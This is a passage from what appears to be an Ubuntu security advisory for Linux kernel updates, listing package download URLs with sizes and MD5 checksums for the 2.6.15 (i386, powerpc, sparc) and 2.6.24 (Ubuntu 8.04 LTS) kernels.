http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   299158 458051a07217501718f6e2a742bec0a3\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    51536 d2c7a02ac033097208c359312e95d246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2482 3c964c577c93d80cee55d06e78003951\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40906 84f84dc75718a347eb6623204cab6209\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29892 4a807f384985ae3376d509474716f13a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45054 a2373aac90339698b2cba11e43978565\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     1934 0887612df6acbc867949c33251427c00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2198 d38a4ec22579275ff2f48805be734356\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   161908 70564b18529d383509cb4c1d4898425a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872596 8602056ab95806f02667587737cb3b59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb\n      Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17386 1abc2376b554610aec23e87f60998358\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    85854 59c8914383ae0624690950d8f844c101\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    60378 183583ac6a0ab738109499861a861ca2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    70420 da9263ada0b850362f022c36b6769f22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115790 ac0661102201e3f682eda1052d987671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   168082 6f375034031b861fe42ba973c9390ded\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40380 c083f0781fb33b64329d10c233affde2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   149304 958f0b630326763cddddce5503f3319d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5:   773010 979da22c264d122841ea140319b365ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb\n      Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5: 15017856 479231852577fdd0e402556287a02059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   163276 481deef18ee50e039791747737619c3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    59308 83efde441d0de3f09bb163e53016a300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz\n      Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc\n      Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb\n      Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb\n      Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    52646 2c736bab70f1efeade320f9062b74729\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   209928 